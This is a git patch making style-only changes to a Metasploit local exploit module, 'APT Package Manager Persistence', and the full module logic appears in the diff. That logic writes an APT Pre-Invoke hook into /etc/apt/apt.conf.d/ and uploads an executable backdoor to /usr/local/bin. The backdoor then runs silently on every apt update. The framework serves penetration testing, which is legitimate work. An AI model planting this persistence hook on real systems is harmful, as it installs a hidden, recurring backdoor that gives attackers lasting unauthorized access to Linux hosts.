From bd1113d53c833293eb2e31e375fef0d9e598091c Mon Sep 17 00:00:00 2001 From: Aaron Ringo Date: Thu, 25 Apr 2019 15:55:22 -0500 Subject: [PATCH] Updated some formatting as requested along with some rubocob requested --- .../local/apt_package_manager_persistence.rb | 36 +++++++++---------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/modules/exploits/linux/local/apt_package_manager_persistence.rb b/modules/exploits/linux/local/apt_package_manager_persistence.rb index cc07808e24..ebfa632f79 100644 --- a/modules/exploits/linux/local/apt_package_manager_persistence.rb +++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb @@ -13,15 +13,15 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info = {}) super(update_info(info, 'Name' => 'APT Package Manager Persistence', - 'Description' => %q{ + 'Description' => %q( This module will run a payload when the package manager is used. No handler is ran automatically so you must configure an appropriate exploit/multi/handler to connect. Module creates a pre-invoke hook for APT in apt.conf.d. The Hook name syntax is numeric followed by text. - }, + ), 'License' => MSF_LICENSE, - 'Author' => [ 'Aaron Ringo' ], - 'Platform' => [ 'linux','unix' ], + 'Author' => ['Aaron Ringo'], + 'Platform' => ['linux', 'unix'], 'Arch' => [ ARCH_CMD, @@ -33,29 +33,28 @@ class MetasploitModule < Msf::Exploit::Local ARCH_MIPSLE, ARCH_MIPSBE ], - 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'SessionTypes' => ['shell', 'meterpreter'], 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, 'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian 'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'], - 'Targets' => [ ['Automatic', {}] ], + 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0 )) register_options( [ - OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]), - OptString.new('BACKDOOR_NAME', [ false, 'Name of binary to write' ]) + OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']), + OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write']) ]) register_advanced_options( [ - OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ]) + OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/']) ]) - end + end def exploit - - hook_path = "/etc/apt/apt.conf.d/" + hook_path = '/etc/apt/apt.conf.d/' unless writable? hook_path fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system" end @@ -68,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Local backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10) backdoor_path << backdoor_name - print_status("Attempting to write hook:") + print_status('Attempting to write hook:') hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};" write_file(hook_path, hook_script) unless exist? hook_path - fail_with Failure::Unknown, "Failed to write Hook" + fail_with Failure::Unknown, 'Failed to write Hook' end print_status("Wrote #{hook_path}") @@ -87,11 +86,10 @@ class MetasploitModule < Msf::Exploit::Local fail_with Failure::Unknown, "Failed to write #{backdoor_path}" end print_status("Backdoor uploaded #{backdoor_path}") - print_status("Backdoor will run on next Apt update") + print_status('Backdoor will run on next Apt update') # permissions chosen to reflect common perms in /usr/local/bin/ - chmod(backdoor_path, 0755) - + chmod(backdoor_path, 0755) + end -end - +end \ No newline at end of file